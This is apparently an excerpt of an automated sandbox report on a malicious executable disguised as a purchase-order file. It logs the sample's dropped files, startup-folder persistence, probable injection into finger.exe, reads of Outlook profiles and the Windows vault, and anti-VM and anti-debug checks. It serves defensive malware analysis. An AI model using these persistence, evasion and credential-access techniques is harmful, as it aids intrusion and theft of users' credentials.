Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\finger.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HashSize.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: P.Order request for quotations.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: P.Order request for quotations.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: P.Order request for quotations.exe, P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360028021.0000000000A3F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: P.Order request for quotations.exe, NodeTransformer.cs .Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: HashSize.exe.0.dr, NodeTransformer.cs .Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: 0.2.P.Order request for quotations.exe.3cf3fd0.1.raw.unpack, NodeTransformer.cs .Net Code: CancelTransformer System.AppDomain.Load(byte[])
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, ListDecorator.cs .Net Code: Read
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                      Source: 0.2.P.Order request for quotations.exe.6640000.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                      Source: Yara match File source: 7.2.HashSize.exe.38a0a04.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.P.Order request for quotations.exe.5f80000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.HashSize.exe.38a0a04.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.P.Order request for quotations.exe.5f80000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.HashSize.exe.383bfb0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.HashSize.exe.39a01f0.6.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 7.2.HashSize.exe.39a01f0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000002.1048159785.0000000005F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.1316719764.000000000383B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: P.Order request for quotations.exe PID: 7152, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: HashSize.exe PID: 660, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_004014F0 push FFFFFF89h; retn D8D9h 2_2_00401A97
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_004014F0 push ebx; retn F2A0h 2_2_00401B60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_0042D963 push edi; iretd 2_2_0042D96C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_00407109 push cs; iretd 2_2_0040710B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_004149E2 push edi; retf 2_2_004149E3
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_00406365 push ebx; ret 2_2_00406366
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_00403370 push eax; ret 2_2_00403372
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_00417E8E push ebx; iretd 2_2_00417E90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_00414F55 push 00000079h; retf 2_2_00414F57
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_0040D75B push ss; ret 2_2_0040D760
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_0041870B pushad ; retf 2_2_0041870C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_0041AF95 push esi; iretd 2_2_0041AF97
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Code function: 2_2_017709AD push ecx; mov dword ptr [esp], ecx 2_2_017709B6
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063F9692 push ebx; retf 4_2_063F969B
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063E96D7 push ebx; ret 4_2_063E96D8
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063ED73D push es; ret 4_2_063ED73F
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063FBF91 push edx; iretd 4_2_063FBF94
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063EA47B push cs; iretd 4_2_063EA47D
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_06410CD5 push edi; iretd 4_2_06410CDE
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063F9A32 push ds; iretd 4_2_063F9A33
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063FB200 push ebx; iretd 4_2_063FB202
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063F82C7 push 00000079h; retf 4_2_063F82C9
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063FE307 push esi; iretd 4_2_063FE309
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Code function: 4_2_063F4055 push esp; retf 4_2_063F409E
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_02E809AD push ecx; mov dword ptr [esp], ecx 5_2_02E809B6
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_0033A5F0 push edi; iretd 5_2_0033A5F9
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_0032C766 push cs; retf 5_2_0032C77D
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_00324B1B push ebx; iretd 5_2_00324B1D
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_00312FF2 push ebx; ret 5_2_00312FF3
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_00325398 pushad ; retf 5_2_00325399
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 5_2_0031D970 push esp; retf 5_2_0031D9B9
                      Source: 0.2.P.Order request for quotations.exe.57c0000.2.raw.unpack, mgq64nVMGL0un50mCUJ.cs High entropy of concatenated method names: 'amUVWFOrNo', 'E1MVknNPxV', 'wyWVb8M6I5', 'dYGVcHZsJF', 'PmNVS1xdLI', 'anxVDNy0t7', 'IvyVavNer0', 'oF4VU8pdT1', 'bCGVNeVVxw', 'gUaVH82BU7'
                      Source: 0.2.P.Order request for quotations.exe.57c0000.2.raw.unpack, Ms5MWmBBt40ObvbqMvw.cs High entropy of concatenated method names: 'el4Bn1yFEf', 'H6RBXMA7Ah', 'U3YBMsCsdU', 'o9QByONpcS', 'PicBWOQxal', 'OVeBKsT6ro', 'KG4rD5mIGtd2gP0GRPh', 'VqorUamZASxgAYQU6cH'
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe File created: C:\Users\user\AppData\Roaming\HashSize.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: P.Order request for quotations.exe PID: 7152, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: HashSize.exe PID: 660, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D324
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D7E4
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D944
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D504
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D544
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762D1E4
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B7630154
                      Source: C:\Windows\SysWOW64\finger.exe; API/Special instruction interceptor: Address: 7FF9B762DA44
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Memory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Memory allocated: 2A70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Memory allocated: 29A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Memory allocated: 2460000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Memory allocated: 25E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Memory allocated: 45E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Code function: 2_2_017B096E rdtsc
                      Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\finger.exe; Window / User API: threadDelayed 981
                      Source: C:\Windows\SysWOW64\finger.exe; Window / User API: threadDelayed 8991
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; API coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\finger.exe; API coverage: 2.8 %
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224; Thread sleep time: -80000s >= -30000s
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224; Thread sleep count: 34 > 30
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224; Thread sleep time: -51000s >= -30000s
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224; Thread sleep count: 41 > 30
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe TID: 6224; Thread sleep time: -41000s >= -30000s
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664; Thread sleep count: 981 > 30
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664; Thread sleep time: -1962000s >= -30000s
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664; Thread sleep count: 8991 > 30
                      Source: C:\Windows\SysWOW64\finger.exe TID: 4664; Thread sleep time: -17982000s >= -30000s
                      Source: C:\Windows\SysWOW64\finger.exe; Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exe; Code function: 5_2_0032CB70 FindFirstFileW, FindNextFileW, FindClose
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: HashSize.exe, 00000007.00000002.1277414394.00000000008B5000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                      Source: HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Microsoft|VMWare|Virtual
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034365516.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.000000000289E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.1458939170.0000020FC993C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: wscript.exe, 00000006.00000002.1141813975.000002414CE84000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360759390.0000000000C37000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\finger.exe; Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe; Process queried: DebugPort
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Code function: 2_2_017B096E rdtsc
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Code function: 2_2_00417E13 LdrLoadDll
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exe; Code function: 2_2_01814180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017F63C0 mov eax, dword ptr fs:[00000030h]2_2_017F63C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0183A352 mov eax, dword ptr fs:[00000030h]2_2_0183A352
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01818350 mov ecx, dword ptr fs:[00000030h]2_2_01818350
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01768397 mov eax, dword ptr fs:[00000030h]2_2_01768397
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179438F mov eax, dword ptr fs:[00000030h]2_2_0179438F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0179438F mov eax, dword ptr fs:[00000030h]2_2_0179438F
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0181437C mov eax, dword ptr fs:[00000030h]2_2_0181437C
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176E388 mov eax, dword ptr fs:[00000030h]2_2_0176E388
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_01774260 mov eax, dword ptr fs:[00000030h]2_2_01774260
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0176826B mov eax, dword ptr fs:[00000030h]2_2_0176826B
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov eax, dword ptr fs:[00000030h]2_2_018062A0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_018062A0 mov ecx, dword ptr fs:[00000030h]2_2_018062A0
